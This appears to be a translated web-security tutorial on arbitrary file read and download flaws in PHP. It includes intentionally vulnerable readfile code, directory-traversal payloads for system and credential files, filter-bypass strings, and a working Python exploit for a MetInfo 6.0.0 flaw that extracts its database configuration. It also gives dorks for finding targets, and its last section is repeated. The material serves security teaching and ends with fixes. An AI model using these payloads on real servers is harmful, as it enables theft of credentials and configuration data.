Read any file
1 Overview
Some websites may provide file viewing and downloading functions based on their needs. If there are no restrictions on the files a user can view or download, or if restrictions are bypassed, any file can be viewed or downloaded. These files can be code files, configuration files, sensitive files, etc.
- Arbitrary file reading can lead to disclosure of (sensitive) information:
- Arbitrary file reading is mostly caused by other vulnerabilities, such as RCE, directory traversal, file inclusion, etc.
- There is essentially no difference between reading any file and downloading any file. The information always flows from the service to the browser.
Reading and downloading any file may take different forms, but there is essentially no difference between reading and downloading. From a permission perspective, both reading and downloading require read permission.
1.1 Cause of vulnerability
Regardless of whether it is arbitrary file reading or arbitrary file downloading, the conditions that trigger the vulnerability are the same:
- There is a function (function) for reading files, that is to say, the web application opens the file reading function;
- The path to read the file is controllable by the client, and it completely controls or affects the file path parameters;
- The file path is not verified or the verification is not strict, causing the verification to be bypassed;
- The contents of the file are output.
1.2 Vulnerability hazards
Download any server files, including source code files, system sensitive files, configuration files, etc.
It can be combined with other vulnerabilities to form a complete attack chain. Conduct code audits on source code files to find more vulnerabilities. Read any file and download the files of focus:
- source code
- configuration file
- Sensitive documents
- log file
- …
1.3 Vulnerability classification
- Read any file
- Any file download
1.4 Read arbitrary files
1.4.1 File reading
| function to read file | Function characteristics |
|---|---|
| readfile() | Read file content directly with built-in output function |
| file_get_contents() | Directly reading the file content requires outputting the read content |
| fread() | Open file Calculate file size Read file Output file Close file |
readfile:
// readfile.php
$fp = "../phpinfo.php"; //路径,phpinfo.php文件的路径
readfile($fp); //读取这个路径下的文件
Create a new read_file folder in the root directory of phpstudy, and create a new file_read.php file in the folder.
The content of the file is the above code content. Access this file after successful saving.
http://192.168.16.136/read_file/file_read.php
The access result is a blank page. Looking at the code, we found that the contents of the file under the $fp path were read, but not executed.
file_get_contents:
// file_get_contents.php
$fp = "../phpinfo.php";
echo file_get_contents($fp);
Create a new file_get_contents.php file in the read_file folder.
The content of the file is the above code content. Access this file after successful saving.
http://192.168.16.136/read_file/file_get_contents.php
The access result is a blank page. Looking at the code, we found that the contents of the file under the $fp path were read, but not executed.
fread:
// fread.php
$fp = "../phpinfo.php";
$f = fopen($fp,'r'); //读取文件前,先把$fp中保存的路径中的文件打开
$f_size = filesize($fp); //计算$fp这个路径下文件大小
echo fread($f, $f_size); //从打开的$f这个文件按照一定的大小去读
fclose($f); //读取完成后,关闭文件,否则浪费资源
Create a new fread.php file in the read_file folder.
The content of the file is the above code content. Access this file after successful saving.
http://192.168.16.136/read_file/fread.php
The access result is a blank page. Looking at the code, we found that the contents of the file under the $fp path were read, but not executed.
1.4.2 Read arbitrary files
The variable $fp will capture the filepath parameter passed in the GET method.
$fp = @$_GET['filepath'];
<?php
//$fp = "../phpinfo.php"; //路径,phpinfo.php文件的路径
$fp = @$_GET['filepath']; //通过filepath这个参数传递数据给$fp
readfile($fp); //读取这个路径下的文件
?>
The result of accessing the page is an error because the filepath parameter is empty. Assign the value filepath=.../phpinfo.php to the filepath parameter.
Open F12 and click load to enter the parameters, viwe-source:which means that the URL that follows will be displayed in the form of code.
view-source:http://192.168.16.136/read_file/file_read.php?filepath=../phpinfo.php
The filepath is controllable by the client and has not been verified, which can cause arbitrary file reading vulnerabilities.
?filepath=index.php
?filepath=/etc/passwd
?filepath=c:\windows\system32\drivers\etc\hosts
?filepath=c:\phpstudy_2016\apache\conf\httpd.conf
?filepath=c:\phpstudy_2016\mysql\my.ini
?filepath=../../../../../../../../../../phpstudy_2016/www/phpinfo.php
?filePath=../../../../../../../../windows\system32\drivers\etc\hosts
?filePath=../../../../../../etc/hosts
1.4.3 General permissions
Windows + IIS + ASP/ASPX low privileges
Windows + Apache +PHP high privileges
Windows + Java are definitely high privileges
Linux + Apache + PHP low privilege
Linux + Nginx + PHP Not necessarily (may be higher or lower)
Linux + Java are definitely high privileges
1.5 Download any file
1.5.1 General situation
Direct download: e.g. save image as.
a label download:
<a href = './a.jpg'>IMG Download</a>
1.5.2 PHP implementation
PHP file download implementation process:
-
Read the file first
-
in the output file
-
Available for download
// file-download.php
$fp = './a.jpg';
header('Content-Type:image/jpg');
header('Content-Disposition:attachment;fileName='.basename($fp));
readfile($fp);
1.5.3 Download any file
Conditions for downloading any file:
-
Known target file path
-
Target file path, client controllable
-
Not verified or the verification is not strict
$fp = $_GET['filepath'];
2. Arbitrary file reading attack and defense
2.1 Path filtering
2.1.1 Filter…/
$fp = @$_GET['filepath'];
$fp = str_replace("../","",$fp);
readfile($fp);
<?php
//$fp = "../phpinfo.php"; //路径,phpinfo.php文件的路径
$fp = @$_GET['filepath'];
$fp = str_replace("../","",$fp); //将../替换为空
readfile($fp); //读取这个路径下的文件
?>
access
view-source:http://192.168.16.136/read_file/file_read.php?filepath=....//phpinfo.php
The result was an error.
2.2 Simple bypass
2.2.1 Double-write bypass
?filepath=..././..././..././..././..././windows\system32\drivers\etc\hosts
2.2.2 Absolute path
?filepath=c:/windows\system32\drivers\etc\hosts
2.2.3 Use…\
?filepath=..\..\..\..\..\windows\system32\drivers\etc\hosts
2.2.4 Set whitelist
If three files a.php, b.php, c.php are set up
<?php
//$fp = "../phpinfo.php"; //路径,phpinfo.php文件的路径
$fp = @$_GET['filepath'];
if($fp == 'a.php' or $fp == 'b.php' or $fp == 'c.php')
{
readfile($fp);
}
else
{
echo "Please stop!";
}
?>
3. Arbitrary file reading and mining
3.1 Manual excavation
| Judging from the file name | Judging from the parameter name |
|---|---|
| readfile.php filedownload.php filelist.php |
f= file= filepath= fp= readfile path= readpath url= menu= META-INF= WEB-INF= content= |
The above content may exist for arbitrary file reading
3.2 Classic cases
3.2.1 Vulnerability description
MetInfo is a content management system developed using PHP and MySQL. /app/system/include/module/old_thumb.class.phpAn arbitrary file read vulnerability exists in files in MetInfo version 6.0.0 . An attacker could exploit the vulnerability to read sensitive files on the website.
3.2.2 Vulnerability level
high risk
3.2.3 Affected versions
- MetInfo 6.0.0
3.2.4 Vulnerability recurrence
3.2.4.1 Basic environment
| components | Version |
|---|---|
| OS | Microsoft Windows Server 2016 Standard |
| Web Server | phpStudy 2016 |
| MetInfo | 6.0.0 |
3.2.4.2 Vulnerability points
visit this link
/include/thumb.php
http://192.168.16.136/metinfo_6.0.0/include/thumb.php
Use bp to capture packets, because bp does not capture images by default. Modify the Filter to add images.
Ctrl+R sends the packet to the repeater.
first test
/include/thumb.php?dir=..././http/..././config/config_db.php
Read the database configuration file.
Read failed.
second test
/include/thumb.php?dir=.....///http/.....///config/config_db.php
Read the database configuration file.
Read failed
third test
/include/thumb.php?dir=http/.....///.....///config/config_db.php
Read the database configuration file.
Read failed
fourth test
/include/thumb.php?dir=http\..\..\config\config_db.php
Read the database configuration file.
Read successfully
Notice:
This poc only applies to Windows systems and is invalid for Linux systems
3.2.4.3 In-depth utilization
EXP writing
import requests
import sys
banner = """
MetInfo 6.0.0
___________.__.__ __________ .___
\_ _____/|__| | ____ \______ \ ____ _____ __| _/
| __) | | | _/ __ \ | _// __ \\__ \ / __ |
| \ | | |_\ ___/ | | \ ___/ / __ \_/ /_/ |
\___ / |__|____/\___ > |____|_ /\___ >____ /\____ |
\/ \/ \/ \/ \/ \/
- AJEST
Usage: python3 *.py http://192.168.16.136/metinfo_6.0.0
"""
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}
dir_list = [
"..././http/..././config/config_db.php",
".....///http/.....///config/config_db.php",
"http/.....///.....///config/config_db.php",
"http\..\..\config\config_db.php"
]
def attack(host):
vul = "/include/thumb.php"
url = host + vul
res = requests.get(url = url, headers = headers)
if res.status_code != 200:
print(f"[INFO] {
vul} is Not Exists!")
exit()
print(f"[INFO] {
vul} is Exists!")
for param in dir_list:
params = {
"dir": param
}
res = requests.get(url = url, params = params, headers = headers)
print(f"[INFO] Test URL: {
res.url}")
if "<?php" in res.text:
print("[RESULT] The target is vulnreable!")
print(f"[RESULT]\n{
res.text}")
break
if len(sys.argv) < 2:
print(banner)
exit()
host = sys.argv[1]
attack(host = host)
Create a new exp.py file in kali, copy the above content to the exp.py file, and run the exp.py file without cms exiting.
sudo python3 *.py http://192.168.16.136/metinfo_6.0.0/
3.2.4.4 Fingerprint information
traditional search engine
Powered by MetInfo 6.0.0
intext:"Powered by MetInfo 6.0.0" inurl:"tw"
FLY
app="metinfo"
ZoomEye
app:"MetInfo"
app:"MetInfo"+os:"Windows"
3.2.4.5 Patch recommendations
- Patch
- upgrade
- on device
4. Vulnerability fix plan
4.1 Input and output
Allow web users to access (read) only the required files and paths. (whitelist)
4.2 Avoid other vulnerabilities
Other vulnerabilities may lead to arbitrary file read vulnerabilities
There cannot be file inclusion holes, directory traversal holes, or other holes.
4.3 Limit file access scope
-
Prevent users from accessing paths other than the Web root directory.
-
In the php.ini configuration file, you can limit the scope of file access through the option open_basedir.
open_basedir = C:\phpStudy_20161103\WWW
When php executes arbitrary file reading, the limited access range occurs under the c drive.
Temporarily change php.ini configuration
ini_set("open_basedir","C:\phpStudy_20161103\WWW");
But there is still a risk, other files cannot be read, but it can read itself. Then all the configured information will be exposed.
Therefore, filtering, whitelisting and restricted file prevention must be used comprehensively.
5. Reference links
https://github.com/lijiejie/ds_store_exp https://blog.csdn.net/GitChat/article/details/79014538 https://www.secpulse.com/archives/124398.html https://github.com/kost/dvcs-ripper https://github.com/lijiejie/GitHack http://www.vuln.cn/2225 https://github.com/admintony/svnExploit https://www.freebuf.com/vuls/181698.html
Temporarily change php.ini configuration
ini_set("open_basedir","C:\phpStudy_20161103\WWW");
But there is still a risk, other files cannot be read, but it can read itself. Then all the configured information will be exposed.
Therefore, filtering, whitelisting and restricted file prevention must be used comprehensively.
5. Reference links
https://github.com/lijiejie/ds_store_exp https://blog.csdn.net/GitChat/article/details/79014538 https://www.secpulse.com/archives/124398.html https://github.com/kost/dvcs-ripper https://github.com/lijiejie/GitHack http://www.vuln.cn/2225 https://github.com/admintony/svnExploit https://www.freebuf.com/vuls/181698.html